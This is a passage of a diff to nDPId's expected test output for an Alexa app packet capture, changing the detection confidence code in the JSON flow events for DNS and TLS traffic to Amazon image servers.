00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195921,"flow_last_seen":1490976195921,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976195921,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1490976195921,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1490976195921,"pkt":"AMDKkaPvePiC0\/vCCABFAABNWmZAAEARM0CsECrYrBAqARIEADUAOVP\/iiYBAAABAAAAAAAACWltYWdlcy1uYRFzc2wtaW1hZ2VzLWFtYXpvbgNjb20AAAEAAQ=="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195921,"flow_last_seen":1490976195921,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976195921,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"images-na.ssl-images-amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195921,"flow_last_seen":1490976195921,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976195921,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"images-na.ssl-images-amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00652{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":1490976195980,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1490976195980,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC37AVAAEARoTasECoBrBAq2AA1EgQAo8CaiiaBgAABAAUAAAAACWltYWdlcy1uYRFzc2wtaW1hZ2VzLWFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAAMAHg1kazlwczdnb3FvZWVmCmNsb3VkZnJvbnQDbmV0AMA9AAEAAQAAADsABDRUPnPAPQABAAEAAAA7AAQ0VD7rwD0AAQABAAAAOwAENFQ+v8A9AAEAAQAAADsABDRUPj4="} 
-00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195921,"flow_last_seen":1490976195980,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1490976195980,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"images-na.ssl-images-amazon.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.84.62.115"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195921,"flow_last_seen":1490976195980,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1490976195980,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"images-na.ssl-images-amazon.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.84.62.115"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195983,"flow_last_seen":1490976195983,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195983,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1490976195983,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195983,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8wa5AAEAGL16sECrYNFQ+c6O4AbsdU0twAAAAAKAC\/\/9kRAAAAgQFtAQCCAoA9oreAAAAAAEDAwg="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2866,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195984,"flow_last_seen":1490976195984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195984,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -892,186 +892,186 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2870,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1490976196001,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196001,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7jUvy2sHVNLcaAScSD3DwAAAgQFtAQCCAps+oycAPaK3gEDAwg="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2871,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_packet_id":3,"flow_last_seen":1490976196002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196002,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0CnRAAEAG5qCsECrYNFQ+c6O5Abv6a4CuA2RlJoAQAVcj2AAAAQEICgD2iuBs+oX0"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2872,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1490976196003,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196003,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0wa9AAEAGL2WsECrYNFQ+c6O4AbsdU0tx1L8trYAQAVeVpAAAAQEICgD2iuBs+oyc"} 
-00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2873,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195984,"flow_last_seen":1490976196003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196003,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195983,"flow_last_seen":1490976196005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196005,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2873,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195984,"flow_last_seen":1490976196003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196003,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195983,"flow_last_seen":1490976196005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196005,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2875,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":1490976196008,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196008,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7r33SsOWDm7RKAScSApGwAAAgQFtAQCCAps+o9VAPaK3gEDAwg="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2876,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":3,"flow_last_seen":1490976196009,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196009,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0MZ5AAEAGv3asECrYNFQ+c6O6AbtYObtE990rD4AQAVfHrwAAAQEICgD2iuBs+o9V"} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195985,"flow_last_seen":1490976196010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196010,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195985,"flow_last_seen":1490976196010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196010,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196016,"flow_last_seen":1490976196016,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196016,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1490976196016,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196016,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8LWlAAEAG4smsECrYNu8csuLAAbtkEKeIAAAAAKAC\/\/+hiQAAAgQFtAQCCAoA9orhAAAAAAEDAwg="} 
-00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195984,"flow_last_seen":1490976196033,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196033,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195984,"flow_last_seen":1490976196034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196034,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, 
O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195985,"flow_last_seen":1490976196037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2890,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195985,"flow_last_seen":1490976196038,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196038,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2892,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195983,"flow_last_seen":1490976196039,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196039,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2894,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195983,"flow_last_seen":1490976196041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196041,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195984,"flow_last_seen":1490976196033,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196033,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195984,"flow_last_seen":1490976196034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196034,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} 
+00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195985,"flow_last_seen":1490976196037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2890,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195985,"flow_last_seen":1490976196038,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196038,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 